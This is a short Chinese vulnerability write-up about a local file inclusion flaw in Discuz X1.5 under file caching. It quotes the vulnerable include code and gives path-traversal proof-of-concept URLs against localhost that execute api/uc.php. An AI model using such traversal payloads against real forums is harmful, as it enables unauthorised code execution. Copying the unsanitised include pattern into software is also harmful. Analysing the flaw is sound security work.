DISCUZ X1.5 本地文件包含漏洞

admin 漏洞分析 2022-02-17 09:46:21 漏洞分析包含漏洞文件本地 &hellip &lsquo cachenames action"

　　DISCUZX1.5 本地文件包含，当然是有条件的，就是使用文件作为缓存。

　　config_global.php

　　$_config['cache']['type'] = ‘file’;

　　function cachedata($cachenames) {

　　……

　　$isfilecache = getglobal(‘config/cache/type’) == ‘file’;

　　……

　　if($isfilecache) {

　　$lostcaches = array();

　　foreach($cachenames as $cachename) {

　　if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {

　　$lostcaches[] = $cachename;

　　}

　　……

　　}

　　地址：

　　http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

　　http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried

　　执行了 api/uc.php 页面代码了。

　　作者： Jannock

版权声明

本文仅代表作者观点，不代表本站立场。
本文系作者授权发表，未经许可，不得转载。
本文地址：/websafe/loudongfenxi/149503.html

上一篇 : 网站服务器如何有效防御PHP木马攻击

下一篇 : 万能密码漏洞以及修复

留言与评论（共有 0 条评论）

1000元配置

2000元配置

3000元配置

4000元配置

5000元配置

6000元配置

7000元配置

8000元配置

9000元配置

万元配置

i3配置

i5配置

i7配置

APU配置

R5配置

R7配置

游戏攻略

软件教程

Win10教程

Win7教程

Mac教程

Linux教程

U盘教程

Server教程

DISCUZ X1.5 本地文件包含漏洞

版权声明

热门文章

最近发表

标签列表

| 桂ICP备2023010378号-4

Powered By EmpireCMS

DISCUZ X1.5 本地文件包含漏洞

版权声明

相关文章

热门文章

最近发表

标签列表

var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?1cc50873f5e983e8073d99a425b87921"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); | 桂ICP备2023010378号-4

Powered By EmpireCMS

| 桂ICP备2023010378号-4